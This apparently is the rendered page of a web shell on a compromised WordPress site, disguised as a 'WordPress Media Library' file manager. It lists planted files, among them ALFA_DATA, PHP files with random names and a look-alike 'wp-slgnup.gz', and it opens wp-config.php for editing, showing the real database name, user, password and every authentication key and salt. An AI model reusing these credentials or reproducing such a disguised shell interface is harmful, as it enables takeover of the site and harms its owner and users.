β WordPress Media Library
File manager
π Media Files
π .ent
π .htaccess
π .k
π .res
π .tmb
π ALFA_DATA
π CYEC07_2winners
π§ drum.php
π§ dz2obinl.php
π english_gb
π§ get.php
π google00199521a7227898.html
π google04df80ca1b1ccf54.html
π google0a32d1bf32902599.html
π google80933f13bdd078a6.html
π googleea78e552fedf758c.html
π§ hiroshi.php
π§ index.php
π§ item.php
π license.txt
π§ m00emf1a.php
π§ main.php
π§ nrhshh40.php
π readme.html
π§ retries.php
π robots.txt
π§ srtain.php
π§ wp-activate.php
π wp-admin
π§ wp-blog-header.php
π§ wp-comments-post.php
π§ wp-config.php
π wp-content
π§ wp-cron.php
π wp-includes
π§ wp-links-opml.php
π§ wp-load.php
π§ wp-login.php
π§ wp-mail.php
π§ wp-settings.php
π§ wp-signup.php
π wp-slgnup.gz
π§ wp-trackback.php
π§ xmlrpc.php
β¬οΈ Upload Media
Upload File
π Edit: wp-config.php
Size: 3.56 KB | Modified: 2026-07-02 08:16:04
<?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the website, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'vanvango_wp_nordesvan' ); /** Database username */ define( 'DB_USER', 'vanvango_nordesvan' ); /** Database password */ define( 'DB_PASSWORD', 'pziH83e:ZLIX/QeW' ); /** Database hostname */ define( 'DB_HOST', 'localhost' ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8mb4' ); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define( 'AUTH_KEY', 'bCJ5kih|!Wc_OOI^B=2~^AE&Q6PFerH/:6~BWf#8=mn.)ZOPMP47pwHLYtn6#5q|' ); define( 'SECURE_AUTH_KEY', 'AT|;J=l/yi/V| &G|KPymTjOX^][{xty(OwPZR-]4Es5G>ar;`*V~?+J3eIjS}-7' ); define( 'LOGGED_IN_KEY', '7*^s%I@zfgK?uw=<v%$ZsdFjua0^*JNatuPsy*W.Dz??hMAbOum9.qa6?DKjsK j' ); define( 'NONCE_KEY', '{1>nX*KIrnX/zqSN6e-?x6,$>pcdF#bM Ty?E3/Qu_7R`n`mUHN)NsR.czu!wT<x' ); define( 'AUTH_SALT', '_A8,tj>>{=rNCP>ixvZ+CiiH)g2r9bcGti$+=ZQBX]?iBI.8OS H,-`*|qJ[mVLO' ); define( 'SECURE_AUTH_SALT', 'ArLHmX,f%gpxfo?et;:TbG4LA;%u^(l*x`Sqg<$<.wf%Bz0P*@YJ%~0m;;oc{-(!' ); define( 'LOGGED_IN_SALT', '_<yyxC0jEKCZ(:db$,54/+L)1M P}?*mw0^r]dN^NneVMa1D%@+ZblUuEH{M(]?^' ); define( 'NONCE_SALT', 'uh`s&`c`dO^m{Gz,%TGd623&GdHQS)*@KA*Oa3D|PH?Uh=Jz?=82ZaA1ydUq^[%P' ); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! * * At the installation time, database tables are created with the specified prefix. * Changing this value after WordPress is installed will make your site think * it has not been installed. * * @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/#table-prefix */ $table_prefix = 'wp_'; /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://developer.wordpress.org/advanced-administration/debug/debug-wordpress/ */ define( 'WP_DEBUG', false ); /* Add any custom values between this line and the "stop editing" line. */ /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';
πΎ Save Changes
π₯ Download
ποΈ Delete